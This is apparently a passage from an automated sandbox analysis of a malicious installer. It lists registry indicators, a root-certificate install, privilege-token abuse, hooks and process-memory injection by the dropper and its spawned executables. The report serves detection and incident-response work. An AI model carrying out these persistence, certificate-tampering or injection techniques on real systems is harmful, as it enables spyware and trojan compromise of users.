Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthlyUploadRestriction = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "0.000000"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket	IbyOOzs.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "4120"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrCnt = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LANConnectionCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkBps = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadRatePct = "100"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkBps = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "0.003325"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\BkDownloadRatePct = "45"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadPendingCount = "0"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PeerInfoCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\GroupConnectionCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadCount = "0"	svchost.exe

Modifies registry class 19 IoCs

Processes:

SearchApp.exemsedge.exeSearchApp.exeZh3M5OU4FZcI7PVNDwUeCUKJ.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\www.bing.com	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\bing.com	SearchApp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\MuiCache	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings	Zh3M5OU4FZcI7PVNDwUeCUKJ.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\MuiCache	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com	SearchApp.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

File.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	File.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	File.exe

Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 46 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

description	flow	ioc
HTTP User-Agent header	46	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

soft.exemsedge.exeFile.exemsedge.exe48b85f34-ba76-4a43-8811-51001d013e78.exeidentity_helper.exemsedge.exeNROUveYetDLp89YeLjvoyKcP.exeT4GuP5xLZ5KygBfWzf7jpOvR.exeVdcmpLWQ4sQClzr_v_nHf2ng.exePSJX3kTgFrzS6xbKJXjbH2XR.exeLzWgYoMzjeu0S_yZPBZpgsk3.exeMFPmIIhwR3njJSHvNPzgPYo6.exe1.exe

pid	process
1292	soft.exe
1292	soft.exe
2812	msedge.exe
2812	msedge.exe
3476	File.exe
3476	File.exe
3476	File.exe
3476	File.exe
3476	File.exe
3476	File.exe
3476	File.exe
3476	File.exe
3476	File.exe
3476	File.exe
3476	File.exe
3476	File.exe
3476	File.exe
3476	File.exe
3476	File.exe
3476	File.exe
3476	File.exe
3476	File.exe
3476	File.exe
3476	File.exe
3476	File.exe
3476	File.exe
3476	File.exe
3476	File.exe
3476	File.exe
3476	File.exe
3476	File.exe
3476	File.exe
3476	File.exe
3476	File.exe
3476	File.exe
3476	File.exe
3476	File.exe
3476	File.exe
3476	File.exe
3476	File.exe
3692	msedge.exe
3692	msedge.exe
3980	48b85f34-ba76-4a43-8811-51001d013e78.exe
3980	48b85f34-ba76-4a43-8811-51001d013e78.exe
4088	identity_helper.exe
4088	identity_helper.exe
3556	msedge.exe
3556	msedge.exe
3556	msedge.exe
3556	msedge.exe
3980	48b85f34-ba76-4a43-8811-51001d013e78.exe
3000	NROUveYetDLp89YeLjvoyKcP.exe
3000	NROUveYetDLp89YeLjvoyKcP.exe
3344	T4GuP5xLZ5KygBfWzf7jpOvR.exe
3344	T4GuP5xLZ5KygBfWzf7jpOvR.exe
4108	VdcmpLWQ4sQClzr_v_nHf2ng.exe
4108	VdcmpLWQ4sQClzr_v_nHf2ng.exe
2624	PSJX3kTgFrzS6xbKJXjbH2XR.exe
2624	PSJX3kTgFrzS6xbKJXjbH2XR.exe
4100	LzWgYoMzjeu0S_yZPBZpgsk3.exe
4100	LzWgYoMzjeu0S_yZPBZpgsk3.exe
3012	MFPmIIhwR3njJSHvNPzgPYo6.exe
3012	MFPmIIhwR3njJSHvNPzgPYo6.exe
3668	1.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

Processes:

msedge.exe

pid process

3692 msedge.exe
3692 msedge.exe
3692 msedge.exe
3692 msedge.exe
3692 msedge.exe
3692 msedge.exe
3692 msedge.exe

pid	process
3692	msedge.exe
3692	msedge.exe
3692	msedge.exe
3692	msedge.exe
3692	msedge.exe
3692	msedge.exe
3692	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

askinstall49.exetaskkill.exeProxyupd.exeRobCleanerInstl3183813.exe48b85f34-ba76-4a43-8811-51001d013e78.exeDzNmPWdwKQwiMdPEyWA0pWIZ.exeUPLs6tY8WjwSKiXVW8fL8JqY.exepowershell.exepowershell.exeWerFault.exetaskkill.exec8543649-03e9-461c-bb64-bc5598521773.exego-memexec-2546849896.exeVdcmpLWQ4sQClzr_v_nHf2ng.exeNROUveYetDLp89YeLjvoyKcP.exe1.exeMFPmIIhwR3njJSHvNPzgPYo6.exeT4GuP5xLZ5KygBfWzf7jpOvR.exePSJX3kTgFrzS6xbKJXjbH2XR.exeEJegy7njpw4NcGC4TPkpQFA9.exejg1_1faf.exe93ca6fa8-9fe0-4132-baf8-6414ddbd5187.exepowershell.exepowershell.exetaskkill.exe

description	pid	process
Token: SeCreateTokenPrivilege	3372	askinstall49.exe
Token: SeAssignPrimaryTokenPrivilege	3372	askinstall49.exe
Token: SeLockMemoryPrivilege	3372	askinstall49.exe
Token: SeIncreaseQuotaPrivilege	3372	askinstall49.exe
Token: SeMachineAccountPrivilege	3372	askinstall49.exe
Token: SeTcbPrivilege	3372	askinstall49.exe
Token: SeSecurityPrivilege	3372	askinstall49.exe
Token: SeTakeOwnershipPrivilege	3372	askinstall49.exe
Token: SeLoadDriverPrivilege	3372	askinstall49.exe
Token: SeSystemProfilePrivilege	3372	askinstall49.exe
Token: SeSystemtimePrivilege	3372	askinstall49.exe
Token: SeProfSingleProcessPrivilege	3372	askinstall49.exe
Token: SeIncBasePriorityPrivilege	3372	askinstall49.exe
Token: SeCreatePagefilePrivilege	3372	askinstall49.exe
Token: SeCreatePermanentPrivilege	3372	askinstall49.exe
Token: SeBackupPrivilege	3372	askinstall49.exe
Token: SeRestorePrivilege	3372	askinstall49.exe
Token: SeShutdownPrivilege	3372	askinstall49.exe
Token: SeDebugPrivilege	3372	askinstall49.exe
Token: SeAuditPrivilege	3372	askinstall49.exe
Token: SeSystemEnvironmentPrivilege	3372	askinstall49.exe
Token: SeChangeNotifyPrivilege	3372	askinstall49.exe
Token: SeRemoteShutdownPrivilege	3372	askinstall49.exe
Token: SeUndockPrivilege	3372	askinstall49.exe
Token: SeSyncAgentPrivilege	3372	askinstall49.exe
Token: SeEnableDelegationPrivilege	3372	askinstall49.exe
Token: SeManageVolumePrivilege	3372	askinstall49.exe
Token: SeImpersonatePrivilege	3372	askinstall49.exe
Token: SeCreateGlobalPrivilege	3372	askinstall49.exe
Token: 31	3372	askinstall49.exe
Token: 32	3372	askinstall49.exe
Token: 33	3372	askinstall49.exe
Token: 34	3372	askinstall49.exe
Token: 35	3372	askinstall49.exe
Token: SeDebugPrivilege	368	taskkill.exe
Token: SeDebugPrivilege	3716	Proxyupd.exe
Token: SeDebugPrivilege	2440	RobCleanerInstl3183813.exe
Token: SeDebugPrivilege	3980	48b85f34-ba76-4a43-8811-51001d013e78.exe
Token: SeDebugPrivilege	3752	DzNmPWdwKQwiMdPEyWA0pWIZ.exe
Token: SeDebugPrivilege	2536	UPLs6tY8WjwSKiXVW8fL8JqY.exe
Token: SeDebugPrivilege	3448	powershell.exe
Token: SeDebugPrivilege	4136	powershell.exe
Token: SeRestorePrivilege	5876	WerFault.exe
Token: SeBackupPrivilege	5876	WerFault.exe
Token: SeBackupPrivilege	5876	WerFault.exe
Token: SeDebugPrivilege	5008	taskkill.exe
Token: SeDebugPrivilege	5448	c8543649-03e9-461c-bb64-bc5598521773.exe
Token: SeDebugPrivilege	4996	go-memexec-2546849896.exe
Token: SeDebugPrivilege	4108	VdcmpLWQ4sQClzr_v_nHf2ng.exe
Token: SeDebugPrivilege	3000	NROUveYetDLp89YeLjvoyKcP.exe
Token: SeDebugPrivilege	3668	1.exe
Token: SeDebugPrivilege	3012	MFPmIIhwR3njJSHvNPzgPYo6.exe
Token: SeDebugPrivilege	3344	T4GuP5xLZ5KygBfWzf7jpOvR.exe
Token: SeDebugPrivilege	2624	PSJX3kTgFrzS6xbKJXjbH2XR.exe
Token: SeDebugPrivilege	3660	EJegy7njpw4NcGC4TPkpQFA9.exe
Token: SeManageVolumePrivilege	5324	jg1_1faf.exe
Token: SeDebugPrivilege	4724	93ca6fa8-9fe0-4132-baf8-6414ddbd5187.exe
Token: SeDebugPrivilege	2472	powershell.exe
Token: SeManageVolumePrivilege	5324	jg1_1faf.exe
Token: SeDebugPrivilege	5788	powershell.exe
Token: SeManageVolumePrivilege	5324	jg1_1faf.exe
Token: SeManageVolumePrivilege	5324	jg1_1faf.exe
Token: SeManageVolumePrivilege	5324	jg1_1faf.exe
Token: SeDebugPrivilege	3200	taskkill.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

msedge.exe

pid process

3692 msedge.exe
3692 msedge.exe

pid	process
3692	msedge.exe
3692	msedge.exe

Suspicious use of SetWindowsHookEx 24 IoCs

Processes:

File.exe8ZCfgm0NuWkp7PKQifskxkTL.exeLzWgYoMzjeu0S_yZPBZpgsk3.exeIvsskHJfubsqZ5nFS_xpOLRK.exeVdcmpLWQ4sQClzr_v_nHf2ng.exePSJX3kTgFrzS6xbKJXjbH2XR.exeNROUveYetDLp89YeLjvoyKcP.exeT4GuP5xLZ5KygBfWzf7jpOvR.exeMFPmIIhwR3njJSHvNPzgPYo6.exebeb9YTbvJFLvLXX592jpxOvD.exeSm_lvl2URwt3bkdpYbN6ppsk.exe9hvXSXrdixXuUYtM4HT7kFel.exeUPLs6tY8WjwSKiXVW8fL8JqY.exeImMSMmAqtHpIJOu_JPRVxsxL.exeZh3M5OU4FZcI7PVNDwUeCUKJ.exedhgUgg1lwzVFLeDAWWwO2YJd.exe1BwX9cFBeToivHJC1osbHAsz.exe1.exeInstall.exeInstall.exec8543649-03e9-461c-bb64-bc5598521773.exejg1_1faf.exeSearchApp.exeSearchApp.exe

pid	process
3476	File.exe
2928	8ZCfgm0NuWkp7PKQifskxkTL.exe
4100	LzWgYoMzjeu0S_yZPBZpgsk3.exe
2616	IvsskHJfubsqZ5nFS_xpOLRK.exe
4108	VdcmpLWQ4sQClzr_v_nHf2ng.exe
2624	PSJX3kTgFrzS6xbKJXjbH2XR.exe
3000	NROUveYetDLp89YeLjvoyKcP.exe
3344	T4GuP5xLZ5KygBfWzf7jpOvR.exe
3012	MFPmIIhwR3njJSHvNPzgPYo6.exe
368	beb9YTbvJFLvLXX592jpxOvD.exe
4140	Sm_lvl2URwt3bkdpYbN6ppsk.exe
2516	9hvXSXrdixXuUYtM4HT7kFel.exe
2536	UPLs6tY8WjwSKiXVW8fL8JqY.exe
4132	ImMSMmAqtHpIJOu_JPRVxsxL.exe
3220	Zh3M5OU4FZcI7PVNDwUeCUKJ.exe
4148	dhgUgg1lwzVFLeDAWWwO2YJd.exe
4116	1BwX9cFBeToivHJC1osbHAsz.exe
3668	1.exe
4460	Install.exe
3236	Install.exe
5448	c8543649-03e9-461c-bb64-bc5598521773.exe
5324	jg1_1faf.exe
1816	SearchApp.exe
5756	SearchApp.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Setup_x32_x64.exemsedge.exemsedge.exemsedge.exeFolder.exe

description	pid	process	target process
PID 3868 wrote to memory of 3704	3868	Setup_x32_x64.exe	msedge.exe
PID 3868 wrote to memory of 3704	3868	Setup_x32_x64.exe	msedge.exe
PID 3868 wrote to memory of 3716	3868	Setup_x32_x64.exe	Proxyupd.exe
PID 3868 wrote to memory of 3716	3868	Setup_x32_x64.exe	Proxyupd.exe
PID 3868 wrote to memory of 3716	3868	Setup_x32_x64.exe	Proxyupd.exe
PID 3704 wrote to memory of 2500	3704	msedge.exe	msedge.exe
PID 3704 wrote to memory of 2500	3704	msedge.exe	msedge.exe
PID 3868 wrote to memory of 3692	3868	Setup_x32_x64.exe	msedge.exe
PID 3868 wrote to memory of 3692	3868	Setup_x32_x64.exe	msedge.exe
PID 3868 wrote to memory of 3200	3868	Setup_x32_x64.exe	Folder.exe
PID 3868 wrote to memory of 3200	3868	Setup_x32_x64.exe	Folder.exe
PID 3868 wrote to memory of 3200	3868	Setup_x32_x64.exe	Folder.exe
PID 3868 wrote to memory of 2440	3868	Setup_x32_x64.exe	RobCleanerInstl3183813.exe
PID 3868 wrote to memory of 2440	3868	Setup_x32_x64.exe	RobCleanerInstl3183813.exe
PID 3868 wrote to memory of 2440	3868	Setup_x32_x64.exe	RobCleanerInstl3183813.exe
PID 3692 wrote to memory of 3508	3692	msedge.exe	msedge.exe
PID 3692 wrote to memory of 3508	3692	msedge.exe	msedge.exe
PID 3868 wrote to memory of 1292	3868	Setup_x32_x64.exe	soft.exe
PID 3868 wrote to memory of 1292	3868	Setup_x32_x64.exe	soft.exe
PID 3868 wrote to memory of 1292	3868	Setup_x32_x64.exe	soft.exe
PID 3868 wrote to memory of 368	3868	Setup_x32_x64.exe	msedge.exe
PID 3868 wrote to memory of 368	3868	Setup_x32_x64.exe	msedge.exe
PID 3868 wrote to memory of 3372	3868	Setup_x32_x64.exe	askinstall49.exe
PID 3868 wrote to memory of 3372	3868	Setup_x32_x64.exe	askinstall49.exe
PID 3868 wrote to memory of 3372	3868	Setup_x32_x64.exe	askinstall49.exe
PID 368 wrote to memory of 1216	368	msedge.exe	msedge.exe
PID 368 wrote to memory of 1216	368	msedge.exe	msedge.exe
PID 3868 wrote to memory of 3476	3868	Setup_x32_x64.exe	File.exe
PID 3868 wrote to memory of 3476	3868	Setup_x32_x64.exe	File.exe
PID 3868 wrote to memory of 3476	3868	Setup_x32_x64.exe	File.exe
PID 3200 wrote to memory of 1868	3200	Folder.exe	Folder.exe
PID 3200 wrote to memory of 1868	3200	Folder.exe	Folder.exe
PID 3200 wrote to memory of 1868	3200	Folder.exe	Folder.exe
PID 3692 wrote to memory of 3656	3692	msedge.exe	msedge.exe
PID 3692 wrote to memory of 3656	3692	msedge.exe	msedge.exe
PID 3692 wrote to memory of 3656	3692	msedge.exe	msedge.exe
PID 3692 wrote to memory of 3656	3692	msedge.exe	msedge.exe
PID 3692 wrote to memory of 3656	3692	msedge.exe	msedge.exe
PID 3692 wrote to memory of 3656	3692	msedge.exe	msedge.exe
PID 3692 wrote to memory of 3656	3692	msedge.exe	msedge.exe
PID 3692 wrote to memory of 3656	3692	msedge.exe	msedge.exe
PID 3692 wrote to memory of 3656	3692	msedge.exe	msedge.exe
PID 3692 wrote to memory of 3656	3692	msedge.exe	msedge.exe
PID 3692 wrote to memory of 3656	3692	msedge.exe	msedge.exe
PID 3692 wrote to memory of 3656	3692	msedge.exe	msedge.exe
PID 3692 wrote to memory of 3656	3692	msedge.exe	msedge.exe
PID 3692 wrote to memory of 3656	3692	msedge.exe	msedge.exe
PID 3692 wrote to memory of 3656	3692	msedge.exe	msedge.exe
PID 3692 wrote to memory of 3656	3692	msedge.exe	msedge.exe
PID 3692 wrote to memory of 3656	3692	msedge.exe	msedge.exe
PID 3692 wrote to memory of 3656	3692	msedge.exe	msedge.exe
PID 3692 wrote to memory of 3656	3692	msedge.exe	msedge.exe
PID 3692 wrote to memory of 3656	3692	msedge.exe	msedge.exe
PID 3692 wrote to memory of 3656	3692	msedge.exe	msedge.exe
PID 3692 wrote to memory of 3656	3692	msedge.exe	msedge.exe
PID 3692 wrote to memory of 3656	3692	msedge.exe	msedge.exe
PID 3692 wrote to memory of 3656	3692	msedge.exe	msedge.exe
PID 3692 wrote to memory of 3656	3692	msedge.exe	msedge.exe
PID 3692 wrote to memory of 3656	3692	msedge.exe	msedge.exe
PID 3692 wrote to memory of 3656	3692	msedge.exe	msedge.exe
PID 3692 wrote to memory of 3656	3692	msedge.exe	msedge.exe
PID 3692 wrote to memory of 3656	3692	msedge.exe	msedge.exe
PID 3692 wrote to memory of 3656	3692	msedge.exe	msedge.exe
PID 3692 wrote to memory of 3656	3692	msedge.exe	msedge.exe

C:\Users\Admin\AppData\Local\Temp\Setup_x32_x64.exe
"C:\Users\Admin\AppData\Local\Temp\Setup_x32_x64.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
